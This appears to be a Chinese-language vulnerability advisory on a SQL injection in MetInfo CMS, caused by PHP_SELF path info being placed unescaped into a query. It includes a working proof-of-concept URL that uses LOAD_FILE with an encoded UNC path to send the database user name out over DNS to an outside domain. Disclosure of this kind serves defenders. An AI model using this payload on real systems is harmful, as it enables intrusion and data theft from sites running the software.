MetInfo 注入

1. 发布时间：2016-11-25
2. 公开时间：N/A
3. 漏洞类型：sql注入
4. 危害等级：高
5. 漏洞编号：xianzhi-2016-11-61726270
6. 测试版本：N/A

---

漏洞详情

app/system/include/compatible/metv5_top.php 行27

$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELFs = explode('/', $PHP_SELF);
$query = "SELECT * FROM {$_M['table'][column]} where module!=0 and foldername = '{$PHP_SELFs[count($PHP_SELFs)-2]}' and lang='{$_M['lang']}'";
$column = DB::get_one($query);

$_SERVER['PHP_SELF']跟$_SERVER['SCRIPT_NAME']不同 前者包括pathinfo
比如
/index.php/something/else
$_SERVER['SCRIPT_NAME']就是index.php
而$_SERVER['PHP_SELF']是/index.php/something/else
这里explode之后进入了sql语句 造成注入 找一个包含的地方就可以了

测试方法：

由于metinfo默认没显错 这里注入点也没输出 所以用延时或者类似cloudeye.me的方法来做
需要适当编码

http://192.168.1.170/metinfo/member/login.php/x'%20and%20if((SELECT%20LOAD_FILE(CONCAT(0x5c5c5c5c,(SELECT%20hex(user())),0x2e6c756461732e70772f2f666f6f626172))),1,1)%23%23/a

wireshark抓个包证明下吧

view.png

0x726f6f74406c6f63616c686f7374=root@localhost